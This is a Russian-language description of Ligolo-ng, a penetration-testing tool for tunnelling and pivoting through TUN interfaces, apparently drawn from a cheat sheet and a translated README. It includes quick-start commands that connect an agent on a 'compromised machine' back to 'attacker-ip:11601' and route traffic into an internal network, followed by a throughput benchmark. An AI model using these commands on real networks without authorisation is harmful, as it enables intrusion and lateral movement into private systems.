Продвинутый инструмент для туннелирования и пивотинга в сети с использованием TUN-интерфейса. Позволяет прозрачно направлять трафик через скомпрометированные хосты без socks-proxy. Возможности: - Прозрачный туннель через TUN-интерфейс (не SOCKS) - Любые инструменты работают как с прямым доступом к сети - Мультиплексирование: несколько агентов через один listener - Двойной пивотинг: agent → agent - Зашифрованный TLS-туннель - Агенты под Linux, Windows, macOS - Поддержка UDP-трафика
# Скачать релизы (proxy + agent): # https://github.com/nicocha30/ligolo-ng/releases # На хосте атакующего (proxy): sudo ip tuntap add user $(whoami) mode tun ligolo sudo ip link set ligolo up ./proxy -selfcert -laddr 0.0.0.0:11601 # На скомпрометированной машине (agent): ./agent -connect attacker-ip:11601 -ignore-cert # В консоли proxy: session # выбрать агента ifconfig # посмотреть сети агента start # запустить туннель # Добавить маршрут к внутренней сети: sudo ip route add 192.168.1.0/24 dev ligolo
)
Продвинутый, но при этом простой инструмент для туннелирования, использующий интерфейсы TUN.
📑 Документация Ligolo-ng (Настройка/Быстрый старт)
[!TIP] Ligolo-ng 0.8 добавил множество новых функций, включая: - 🌐 API и удобный веб-интерфейс благодаря L'ami du Raisin, поддерживающий мультиплеер! - ⚙️ Простой файл конфигурации для сохранения настроек туннелирования/прокси - 🚦 Режим демона для запуска Ligolo-ng как службы - 🔗 Автоматическая привязка для автоматической настройки туннелирования при подключении определённого агента - 📶 Простое и автоматическое (autoroute) управление маршрутизацией и интерфейсами на Windows, Linux, MacOS и BSD! - 💀 Завершение агента для удалённого отключения агента
Попробуйте! Релиз: Ligolo-ng 0.8
)
Ligolo-ng — это простой, лёгкий и быстрый инструмент, который позволяет пентестерам устанавливать туннели через обратное TCP/TLS-соединение с использованием интерфейса tun (без необходимости в SOCKS).
Вместо использования SOCKS-прокси или TCP/UDP-форвардеров, Ligolo-ng создаёт сетевой стек в пользовательском пространстве с помощью Gvisor.
При запуске сервера ретрансляции/прокси используется интерфейс tun, пакеты, отправленные на этот интерфейс, транслируются и затем передаются в удалённую сеть агента.
Например, для TCP-соединения:
Это позволяет запускать такие инструменты, как nmap, без использования proxychains (проще и быстрее).
Документация Ligolo-ng, а также шаги для его запуска и настройки доступны на странице Документация Ligolo-ng
На стороне агента — нет! Всё можно выполнить без административных прав.
Однако на вашем сервере ретрансляции/прокси необходимо иметь возможность создавать интерфейс tun.
Легко можно достичь более 100 Мбит/с. Вот тест с помощью iperf с сервера на 200 Мбит/с к соединению на 200 Мбит/с.
$ iperf3 -c 10.10.0.1 -p 24483
Connecting to host 10.10.0.1, port 24483
[ 5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
[ ID] Interval Transfer Bitrate Retr Cwnd
[ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes
[ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes
[ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes
[ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes
[ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes
[ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes
[ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes
[ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes
[ 5] 8.00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes
[ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval Transfer Bitrate Retr
[ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender
[ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver
Поскольку агент работает без привилегий, невозможно пересылать необработанные пакеты. При выполнении NMAP SYN-SCAN выполняется TCP connect() на агенте.
При использовании nmap следует использовать --unprivileged или -PE для избежания ложноположительных результатов.